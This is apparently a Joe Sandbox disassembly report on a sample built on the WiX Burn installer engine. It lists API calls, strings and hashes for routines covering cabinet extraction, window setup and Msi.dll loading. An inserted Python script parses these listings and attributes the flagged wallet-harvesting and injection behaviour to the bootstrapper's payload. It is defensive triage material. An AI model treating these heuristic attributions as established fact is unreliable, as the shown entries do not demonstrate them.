                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeUninitialize
                                                                                                                                                              • String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                                                                                                              • API String ID: 3442037557-1168358783
                                                                                                                                                              • Opcode ID: 44b82ea04f9ce36e902fb29acf2cde1684ca08af3714d242040bb66f3803a84b
                                                                                                                                                              • Instruction ID: 99f2f697bcc6ad2bdb7c6c89c21a89dc466e87084b3b31914d5a75978fb83621
                                                                                                                                                              • Opcode Fuzzy Hash: 44b82ea04f9ce36e902fb29acf2cde1684ca08af3714d242040bb66f3803a84b
                                                                                                                                                              • Instruction Fuzzy Hash: 0851473BE40271E7CB2097ACAD05EEB3665BB71760B224775BD01FF291D6758C0192E2

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              Control-flow graph of the function at 00A042D7 (rendered graph; the node/edge list is not reproduced here). Windows APIs visible on the graph: InitializeCriticalSection (twice), lstrlenW and CompareStringW.
                                                                                                                                                              APIs
                                                                                                                                                              • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,00A05266,?,?,00000000,?,?), ref: 00A04303
                                                                                                                                                              • InitializeCriticalSection.KERNEL32(000000D0,?,?,00A05266,?,?,00000000,?,?), ref: 00A0430C
                                                                                                                                                              • lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,00A05266,?,?,00000000,?,?), ref: 00A04352
                                                                                                                                                              • lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,00A05266,?,?,00000000,?,?), ref: 00A0435C
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00A05266,?,?,00000000,?,?), ref: 00A04370
                                                                                                                                                              • lstrlenW.KERNEL32(burn.filehandle.attached,?,?,00A05266,?,?,00000000,?,?), ref: 00A04380
                                                                                                                                                              • lstrlenW.KERNEL32(burn.filehandle.self,?,?,00A05266,?,?,00000000,?,?), ref: 00A043D0
                                                                                                                                                              • lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,00A05266,?,?,00000000,?,?), ref: 00A043DA
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00A05266,?,?,00000000,?,?), ref: 00A043EE
                                                                                                                                                              • lstrlenW.KERNEL32(burn.filehandle.self,?,?,00A05266,?,?,00000000,?,?), ref: 00A043FE
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen$CompareCriticalInitializeSectionString
                                                                                                                                                              • String ID: Failed to initialize engine section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$engine.cpp
                                                                                                                                                              • API String ID: 3039292287-3209860532
                                                                                                                                                              • Opcode ID: a513954f7a847a85b30d893992019082a2b58d728a4a59cd494df2f53e8df219
                                                                                                                                                              • Instruction ID: 23899b6a9b61354e2b27daa732b75e60c5f1e081ad5ee6c80d10ee116fb8d0fe
                                                                                                                                                              • Opcode Fuzzy Hash: a513954f7a847a85b30d893992019082a2b58d728a4a59cd494df2f53e8df219
                                                                                                                                                              • Instruction Fuzzy Hash: 4B51B0B5A50219BFCB20DBA8EC86F9A776CFF48760F104116F714A72D0D7B1E950CAA0

Control-flow Graph (interactive graph; legend: Executed / Not Executed; node/edge list of the rendered graph omitted)
Entry 00A1E7B4-00A1E7F1; 00A1E7F3-00A1E807: TlsSetValue. 00A1E813-00A1E834: RegisterClassW, continuing either to 00A1E836-00A1E840 GetLastError and 00A1E854-00A1E869 call 00A03821, or to 00A1E86E-00A1E8A5 CreateWindowExW, which continues either to 00A1E8A7-00A1E8B1 GetLastError and 00A1E8C5-00A1E8DA call 00A03821, or to 00A1E8DC-00A1E8F0 SetEvent. Message loop: 00A1E91C-00A1E927 GetMessageW -> 00A1E8F7-00A1E906 IsDialogMessageW -> 00A1E908-00A1E916 TranslateMessage, DispatchMessageW -> back to GetMessageW. 00A1E935-00A1E93C call 00A40237; exit 00A1E93D-00A1E953 UnregisterClassW.
                                                                                                                                                              APIs
                                                                                                                                                              • TlsSetValue.KERNEL32(?,?), ref: 00A1E7FF
                                                                                                                                                              • RegisterClassW.USER32(?), ref: 00A1E82B
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00A1E836
                                                                                                                                                              • CreateWindowExW.USER32(00000080,00A59E54,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 00A1E89D
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00A1E8A7
                                                                                                                                                              • UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 00A1E945
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
                                                                                                                                                              • String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
                                                                                                                                                              • API String ID: 213125376-288575659
                                                                                                                                                              • Opcode ID: ffc6086139e952b1615e361226985dd560113455d04782cd4a37d6cd9fe6ddf6
                                                                                                                                                              • Instruction ID: b6c4b0d89829a9d4654810d2ab8eaa361ee7f6f3836dda0de4bf4cb74a53dbd9
                                                                                                                                                              • Opcode Fuzzy Hash: ffc6086139e952b1615e361226985dd560113455d04782cd4a37d6cd9fe6ddf6
                                                                                                                                                              • Instruction Fuzzy Hash: 9A41817A900225EBDB20CFE5DC49ADEBFB8FF09761F104125FD05AA290D771A945CBA0

Control-flow Graph (interactive graph; legend: Executed / Not Executed; node/edge list of the rendered graph omitted)
Entry 00A0C28F-00A0C2C1 branches either to 00A0C2C3-00A0C2E1 CreateFileW (GetLastError path: 00A0C2E7-00A0C2F1, 00A0C305-00A0C318 call 00A03821, 00A0C31D-00A0C326 call 00A40237) or to 00A0C32B-00A0C347 GetCurrentProcess x2, DuplicateHandle (GetLastError path: 00A0C349-00A0C353, 00A0C367-00A0C37F call 00A03821). 00A0C395-00A0C3A3: SetFilePointerEx (GetLastError path: 00A0C3A5-00A0C3AF, 00A0C3C3-00A0C3D8 call 00A03821, 00A0C3F6-00A0C3FD call 00A40237). 00A0C3E2-00A0C3E6 call 00A21741; exit 00A0C3FE-00A0C404.
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,00A0C47F,00A05405,?,?,00A05445), ref: 00A0C2D6
                                                                                                                                                              • GetLastError.KERNEL32(?,00A0C47F,00A05405,?,?,00A05445,00A05445,00000000,?,00000000), ref: 00A0C2E7
                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,00A0C47F,00A05405,?,?,00A05445,00A05445,00000000,?), ref: 00A0C336
                                                                                                                                                              • GetCurrentProcess.KERNEL32(000000FF,00000000,?,00A0C47F,00A05405,?,?,00A05445,00A05445,00000000,?,00000000), ref: 00A0C33C
                                                                                                                                                              • DuplicateHandle.KERNELBASE(00000000,?,00A0C47F,00A05405,?,?,00A05445,00A05445,00000000,?,00000000), ref: 00A0C33F
                                                                                                                                                              • GetLastError.KERNEL32(?,00A0C47F,00A05405,?,?,00A05445,00A05445,00000000,?,00000000), ref: 00A0C349
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00A0C47F,00A05405,?,?,00A05445,00A05445,00000000,?,00000000), ref: 00A0C39B
                                                                                                                                                              • GetLastError.KERNEL32(?,00A0C47F,00A05405,?,?,00A05445,00A05445,00000000,?,00000000), ref: 00A0C3A5
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
                                                                                                                                                              • String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
                                                                                                                                                              • API String ID: 2619879409-373955632
                                                                                                                                                              • Opcode ID: cbc028c4041ca40a6e73c24bddbb1bd7411befd9efb09557f24072a2771ff7f5
                                                                                                                                                              • Instruction ID: 7dadc468358cbcb189b76149e7728be0d9f3a6bd0c161358e4c9b6afbfb09524
                                                                                                                                                              • Opcode Fuzzy Hash: cbc028c4041ca40a6e73c24bddbb1bd7411befd9efb09557f24072a2771ff7f5
                                                                                                                                                              • Instruction Fuzzy Hash: B341E93A150205ABCB209F69AD49E1BBBB5EBC5730B218529FD149F2D1E771C802DB61

Control-flow Graph (interactive graph; legend: Executed / Not Executed; node/edge list of the rendered graph omitted)
Entry 00A42AF7-00A42B17 call 00A03838; 00A42B1D-00A42B2B call 00A44A6C; then a straight chain of seven GetProcAddress blocks 00A42B30-00A42B4F, 00A42B56-00A42B6F, 00A42B76-00A42B8F, 00A42B96-00A42BAF, 00A42BB6-00A42BCF, 00A42BD6-00A42BEF, 00A42BF6-00A42C10, each followed by a one-line alternative block (00A42B51, 00A42B71, 00A42B91, 00A42BB1, 00A42BD1, 00A42BF1, 00A42C12) that rejoins the chain. 00A42C21-00A42C25, optionally 00A42C27-00A42C2A call 00A45636; exit 00A42C2F-00A42C35.
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00A03838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00A03877
                                                                                                                                                                • Part of subcall function 00A03838: GetLastError.KERNEL32 ref: 00A03881
                                                                                                                                                                • Part of subcall function 00A44A6C: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00A44A9D
                                                                                                                                                              • GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 00A42B41
                                                                                                                                                              • GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 00A42B61
                                                                                                                                                              • GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 00A42B81
                                                                                                                                                              • GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 00A42BA1
                                                                                                                                                              • GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 00A42BC1
                                                                                                                                                              • GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 00A42BE1
                                                                                                                                                              • GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 00A42C01
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$ErrorLast$DirectorySystem
                                                                                                                                                              • String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
                                                                                                                                                              • API String ID: 2510051996-1735120554
                                                                                                                                                              • Opcode ID: 41d5f166b948b248d4bd66c56259736ef42beb000ea1737d41836d1939c60374
                                                                                                                                                              • Instruction ID: 85240be9cd7164fc058a803e8c49f552ee4c4afcda948bd6daf215d5fa439351
                                                                                                                                                              • Opcode Fuzzy Hash: 41d5f166b948b248d4bd66c56259736ef42beb000ea1737d41836d1939c60374
                                                                                                                                                              • Instruction Fuzzy Hash: 13319EB8961209EEDB12DFA0ED02B697BB5F754749F40053AE404D6170E7F60887AFB4
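The per-function API listings in these entries are the part of the report worth scripting over. As an added example that is neither part of the report nor the sample's own code, the Python below parses lines in the format shown on this page (a handful of them copied here as constructed sample input; string arguments that themselves contain commas are not handled), tallies API use, pulls the names passed to GetProcAddress (the sample's runtime-resolved imports, here the Msi.dll and Wow64 functions) and checks the string arguments against a marker set I assume for the WiX Toolset Burn bootstrapper engine: burn.filehandle.attached, burn.filehandle.self and WixBurnMessageWindow, which together with the engine.cpp, uithread.cpp and container.cpp file names in the String IDs above are that engine's own strings. A hit means the functions in these entries belong to the open-source installer stub, so the behaviour behind the score (wallet and browser harvesting, injection) should be attributed to what the bootstrapper runs, not to these functions themselves.

```python
"""Parse the per-function "APIs" listing of a Joe Sandbox disassembly page."""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass

# One report line:  "• Api.MODULE(arg,arg,...), ref: ADDR"
# Variants seen on the page: no argument list ("GetLastError.KERNEL32 ref: ...")
# and calls attributed to a callee ("Part of subcall function ADDR: ...").
_API_LINE = re.compile(
    r"^[•*-]?\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
_HEX = re.compile(r"^[0-9A-Fa-f]+$")

# Constructed sample input: lines copied from the entries on this page.
SAMPLE_API_LINES = (
    "• lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,00A05266,?,?,00000000,?,?), ref: 00A04352",
    "• CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00A05266,?,?,00000000,?,?), ref: 00A04370",
    "• lstrlenW.KERNEL32(burn.filehandle.self,?,?,00A05266,?,?,00000000,?,?), ref: 00A043D0",
    "• UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 00A1E945",
    "• GetLastError.KERNEL32 ref: 00A1E836",
    "  • Part of subcall function 00A03838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00A03877",
    "• GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 00A42B41",
    "• GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 00A42B81",
    "• GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00A43609,00000000,?,00000000), ref: 00A43069",
    "• GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00A430B5",
    "• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A430C1",
    "• DuplicateHandle.KERNELBASE(00000000,?,00A0C47F,00A05405,?,?,00A05445,00A05445,00000000,?,00000000), ref: 00A0C33F",
    "• ExitProcess.KERNEL32 ref: 00A431C0",
)

# Assumed marker set: command-line switches and message-window class name of
# the WiX Toolset Burn bootstrapper engine.
BURN_MARKERS = frozenset({
    "burn.filehandle.attached", "burn.filehandle.self", "WixBurnMessageWindow",
})


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: str                    # address of the call instruction
    subcall: str | None = None  # callee address when the call was attributed to a subroutine

    def string_args(self) -> list[str]:
        # The report prints resolved string pointers as the string itself;
        # everything else is a hex value or "?" (unknown at analysis time).
        return [a for a in self.args if a != "?" and not _HEX.match(a)]


def parse_api_lines(lines) -> list[ApiCall]:
    calls: list[ApiCall] = []
    for line in lines:
        m = _API_LINE.match(line.strip())
        if not m:
            continue  # heading, hash or graph line: not an API record
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             m.group("ref").upper(), m.group("sub")))
    return calls


def resolved_imports(calls: list[ApiCall]) -> list[str]:
    """Names passed to GetProcAddress: the sample's runtime-resolved imports."""
    names: list[str] = []
    for c in calls:
        if c.api == "GetProcAddress":
            names.extend(c.string_args())
    return names


def api_histogram(calls: list[ApiCall]) -> Counter:
    """How often each module!function is called across the parsed entries."""
    return Counter(f"{c.module}!{c.api}" for c in calls)


def burn_markers_found(calls: list[ApiCall]) -> set[str]:
    """Burn engine marker strings that appear as call arguments."""
    seen = {s for c in calls for s in c.string_args()}
    return seen & BURN_MARKERS


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_API_LINES)
    print(f"{len(parsed)} API records")
    print("runtime-resolved imports:", resolved_imports(parsed))
    print("Burn engine markers:", sorted(burn_markers_found(parsed)))
    for name, n in api_histogram(parsed).most_common(3):
        print(f"  {n:2d}  {name}")
```

Pointing the parser at the whole report rather than the sample tuple gives the complete runtime-resolved import list, which is the set to compare against the static import table when judging the "Extensive use of GetProcAddress" signature: names such as the Msi.dll exports and IsWow64Process are what a well-behaved installer resolves dynamically for version tolerance, and they deserve less weight than resolved names that point at injection or credential APIs.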

Control-flow Graph (interactive graph; legend: Executed / Not Executed; node/edge list of the rendered graph omitted)
Entry 00A4304F-00A43073: GetModuleHandleA, continuing either to 00A43075-00A4307F GetLastError and 00A43093-00A430A3 call 00A03821, or to 00A430A8-00A430B9 GetProcAddress and 00A430BB-00A430DF GetProcAddress x3. 00A430FE-00A4311B: CoCreateInstance; 00A4316C-00A4317F call 00A431EB; 00A431BE-00A431C0: ExitProcess; exit 00A431D4-00A431E8.
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00A43609,00000000,?,00000000), ref: 00A43069
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00A2C025,?,00A05405,?,00000000,?), ref: 00A43075
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00A430B5
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A430C1
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 00A430CC
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A430D6
                                                                                                                                                              • CoCreateInstance.OLE32(00A6B6B8,00000000,00000001,00A4B818,?,?,?,?,?,?,?,?,?,?,?,00A2C025), ref: 00A43111
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00A431C0
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
                                                                                                                                                              • String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
                                                                                                                                                              • API String ID: 2124981135-499589564
                                                                                                                                                              • Opcode ID: 55e2b150dd8c751e2a7862d068257e2336a92d04b5d1c7f2d0da5650e258e85a
                                                                                                                                                              • Instruction ID: 38816be1fc1c1a455488546a12de02d931a6e52f8ac432721cc4484f78e9bb3d
                                                                                                                                                              • Opcode Fuzzy Hash: 55e2b150dd8c751e2a7862d068257e2336a92d04b5d1c7f2d0da5650e258e85a
                                                                                                                                                              • Instruction Fuzzy Hash: AC41823EB01215ABDF24DBACC845BAEB7B4AFC5711F114268E901EB250D7B1DE418B90

                                                                                                                                                              Control-flow Graph (rendered graph not reproduced in text extraction; legend: Executed / Not Executed)
                                                                                                                                                              APIs
                                                                                                                                                              • GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 00A3FCD6
                                                                                                                                                              • GetProcAddress.KERNEL32(SystemFunction041), ref: 00A3FCE8
                                                                                                                                                              • GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 00A3FD2B
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00A3FD3F
                                                                                                                                                              • GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 00A3FD77
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00A3FD8B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$ErrorLast
                                                                                                                                                              • String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$`+?s$cryputil.cpp
                                                                                                                                                              • API String ID: 4214558900-776468437
                                                                                                                                                              • Opcode ID: 5c3742c8cd0860a5f42e46648af8d4589a041bdb8646b9952d94793be06a2124
                                                                                                                                                              • Instruction ID: 4d9a24baad78c54f35a8e347dc7104269c249669c8d3aa8e1f1831b4565630db
                                                                                                                                                              • Opcode Fuzzy Hash: 5c3742c8cd0860a5f42e46648af8d4589a041bdb8646b9952d94793be06a2124
                                                                                                                                                              • Instruction Fuzzy Hash: 1E219B36D71335AFC721D795AD0D79669B4B740B95F010132FC03EA260EBA08C42CAF4
                                                                                                                                                              APIs
                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,00A0C3EB,?,00000000,?,00A0C47F), ref: 00A21778
                                                                                                                                                              • GetLastError.KERNEL32(?,00A0C3EB,?,00000000,?,00A0C47F,00A05405,?,?,00A05445,00A05445,00000000,?,00000000), ref: 00A21781
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateErrorEventLast
                                                                                                                                                              • String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
                                                                                                                                                              • API String ID: 545576003-938279966
                                                                                                                                                              • Opcode ID: c18b8f3981ca721545ff3aa62e2c1c534adc976d90ca96cf04cda983b1b5945c
                                                                                                                                                              • Instruction ID: 086eaecd1b220a0d35a3e1f9bbba6638e7748d5e7c657f9084435f2bebcfb6c1
                                                                                                                                                              • Opcode Fuzzy Hash: c18b8f3981ca721545ff3aa62e2c1c534adc976d90ca96cf04cda983b1b5945c
                                                                                                                                                              • Instruction Fuzzy Hash: B321E87BE4063A77D7215BAD6D85F6B699CFB60BA0F124631BE00BB180EB60DC0085E1
                                                                                                                                                              APIs
                                                                                                                                                              • CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 00A208F2
                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 00A2090A
                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 00A2090F
                                                                                                                                                              • DuplicateHandle.KERNELBASE(00000000,?,?), ref: 00A20912
                                                                                                                                                              • GetLastError.KERNEL32(?,?), ref: 00A2091C
                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 00A2098B
                                                                                                                                                              • GetLastError.KERNEL32(?,?), ref: 00A20998
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to duplicate handle to cab container., xrefs: 00A2094A
                                                                                                                                                              • Failed to add virtual file pointer for cab container., xrefs: 00A20971
                                                                                                                                                              • cabextract.cpp, xrefs: 00A20940, 00A209BC
                                                                                                                                                              • <the>.cab, xrefs: 00A208EB
                                                                                                                                                              • Failed to open cabinet file: %hs, xrefs: 00A209C9
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                                                                                                                              • String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
                                                                                                                                                              • API String ID: 3030546534-3446344238
                                                                                                                                                              • Opcode ID: 70501ddc6c9280189aa8fe2e97b66ae8274ab0ffcc81605f7339b0d03de95406
                                                                                                                                                              • Instruction ID: af55ec3b678a208983fb2ec471d57be03461b7638df57a1f9e181bcbe857c3b6
